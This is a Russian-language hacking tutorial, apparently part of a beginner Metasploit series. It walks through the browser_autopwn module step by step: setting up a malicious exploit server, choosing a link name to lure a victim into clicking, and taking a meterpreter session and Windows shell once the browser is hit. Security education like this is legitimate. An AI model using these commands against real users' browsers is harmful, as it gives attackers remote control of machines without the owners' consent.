С возвращением, мои хакеры!

В этой серии, посвященной основам Metasploit, смотрим модуль, который многие начинающие хакеры считают полезным autopwn.
Обычно, когда мы пытаемся взломать целевую машину, мы хотим провести разведку, чтобы узнать о цели как можно больше. А потом, и только потом, выбираем подходящий эксплоит. Мы должны знать,какая используется операционная система, приложения, браузер, версию Java и Flash и т.д. Это утомительная и скучная, но необходимая работа. Использование Java-эксплоита после вызова эксплоита для Flash просто не сработает, и у вас могут опуститься руки.

Красота autopwn заключается в том, что он освобождает от тяжелой работы по изучению целевой машины. Сначала он попытается определить браузер жертвы, а затем начнет «забрасывать» его любыми эксплоитами, которые, по его мнению, могут сработать. Это существенно упрощает жизнь. Недостатком autopwn является то, что он очень шумный. Это может привести либо к обнаружению нас целью, либо к сбою браузера, что обычно и случается.

Давайте посмотрим на него подробнее.

Шаг 1. Запустите Kali и откройте Metasploit

Давайте запустим Kali, а затем Metasploit, выполнив в консоли команду:

kali> msfconsole

Шаг 2. Использование autopwn

Чтобы начать работу с любым эксплоитом, обычно мы начинаем с команды ( use ). Поскольку модуль autopwn находится в auxiliary/server/browser_autopwn, то начинаем с ввода команды:

msf> use auxiliary/server/browser_autopwn

Это загрузит модуль. Затем, если нужно получить дополнительную информацию об этом модуле, можно набрать:

msf > auxiliary(browser_autopwn) > info


Как вы видите на скриншотах выше и ниже, команда info дает нам всю информацию, которая необходима для начала работы, включая описание каждого параметра и краткое описание самого модуля.

Читать также:  Сравнение лучших антивирусных приложений для Android

Шаг 3. Обзор параметров и настройка

Затем, как и почти у всех модулей Metasploit, мы должны попросить его показать параметры:

msf > show options


Нам нужно определить следующие параметры:
LHOST
URIPATHLHOST>— это локальный хост. Другими словами, это наша рабочая система Kali. Поскольку наша находится по адресу 192.168.1. 106, то пишем:

msf > set LHOST 192.168.1.106

Теперь нужно создать URIPATH. Это тот URL-адрес, по которому мы хотим, чтобы эксплоиты находились на нашем вредоносном сервере. Можем назвать его чем угодно, или оставить пустым, а Metasploit заполнит этот параметр значением по умолчанию. Поскольку мы пытаемся заставить жертву кликнуть на эту ссылку, то давайте попробуем сделать ее соблазнительной, и используем имя нашего любимого сайта для хакеров, Null Byte:

msf > set URIPATH null_byte


Для начала это единственные параметры, которые нам нужно установить.

Шаг 4. Эксплоит

Наконец, давайте введем команду ( exploit ):

msf > exploit

Это запустит модуль autopwn. Он запускает множество серверов, а затем загружает эксплоиты, которые могут сработать против браузера целевой машины. Каждый из них представляет собой различную возможную уязвимость в целевом браузере. Будьте терпеливы, поскольку это занимает некоторое время.

В середине скриншота выше видно, что загружено 20 модулей эксплоитов.

Шаг 5. Переход на сервер

Теперь из системы Windows 7 с Internet Explorer 9, когда цель переходит на наш веб-сервер по адресу 192.168.1.106:8080/null_byte, они получат примерно такое предупреждение от IE:

Вернемся к нашей системе Kali, autopwn обнаружил браузер и попытался определить, какой из эксплоитов будет работать.

Обратите внимание, в середине скриншота видно, что autopwn «получил ответ по 13 эксплоитам». Теперь он начнет пробовать использовать каждый из этих эксплоитов против браузера с надеждой, что по крайней мере один из них сработает.

Читать также:  Гид по интернету в Египте: Wi-Fi, мобильный интернет через SIM-карту, заблокированные ресурсы и VPN

Шаг 6. Проверьте вашу сессию

Вернемся к нашей системе Kali и посмотрим, открылись ли какие-нибудь сессии.Наберите:

sessions -l

Когда мы это сделаем, Metasploit перечислит все активные сессии. Похоже, что у нас есть только одна.

Чтобы подключиться к сессии meterpreter, мы просто вводим:

sessions -i 1

Где 1 — идентификатор нашей сессии из предыдущей команды (видите его в крайней левой колонке?). Затем эта команда подключит нас к meterpreter, приглашение которого выглядит так:

meterpreter>

Это наше прямое соединение с машиной Windows 7. И когда мы напечатаем:

meterpreter> shell

он перебросит нас в оболочку командной строки Windows, как показано ниже.

В зависимости от браузера и его конфигурации вы можете получить несколько сессий meterpreter.Можете получить одну, точно так же, как мы описали в этой статье, а можете и вовсе не получить ни одной. В худшем случае все эксплоиты, запущенные в браузере, могут привести к падению браузера.
Хотя autopwn — хороший инструмент для обучения Metasploit, его работа слишком заметна и часто будет перегружать браузер эксплоитами, что будет приводить к его падениям. Обязательно возвращайтесь, так мы сможем исследовать всю внутреннюю работу нашего любимого инструмента хакинга Metasploit!

Предыдущие статьи (1 , 2 , 3 , 4 , 5 , 6).

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.
Показать больше в Обучение

Оставить комментарий

Проверьте также

4 простых способа защитить смартфон Android от вредоносного ПО

Содержание:Способ 1. Не полагайтесь на Google Play ProtectСпособ 2. Проверьте разрешения п…